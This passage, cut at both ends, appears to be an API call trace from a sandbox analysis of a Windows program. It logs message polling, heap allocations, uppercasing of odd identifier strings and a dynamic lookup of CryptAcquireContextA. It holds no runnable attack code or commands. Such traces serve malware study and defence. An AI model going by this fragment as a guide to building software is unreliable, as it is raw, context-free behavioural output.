hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0105.332] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0105.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0105.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0105.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fe0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0105.333] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0x9bee68) returned 1 [0105.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.333] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0105.333] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.333] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0105.333] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.333] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.333] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.333] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.334] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0105.334] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.334] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0105.334] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.334] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0105.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.334] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0105.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.334] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0105.334] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.334] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0105.335] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.335] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.335] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0105.335] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0105.528] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0105.528] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 1 [0105.528] TranslateMessage (lpMsg=0x8ced58) returned 0 [0105.528] DispatchMessageW (lpMsg=0x8ced58) returned 0x0 [0105.528] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0105.528] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0105.529] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0105.529] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74478 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0105.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0105.530] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0105.530] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0105.530] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a746b8 [0105.530] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0105.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0105.530] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0105.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0105.531] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0105.531] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0105.531] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a746b8 | out: hHeap=0x2af0000) returned 1 [0105.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.531] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0105.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0105.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0105.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0105.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0105.532] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0105.532] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0105.532] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0105.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0105.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0105.532] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0105.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0105.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0105.532] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0105.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0105.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0105.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0105.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0105.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0105.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0105.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0105.533] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0105.533] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0105.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0105.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0105.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0105.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0105.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0105.533] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0105.534] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0105.534] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0105.534] HeapFree (in: hHeap=0x2af0000, 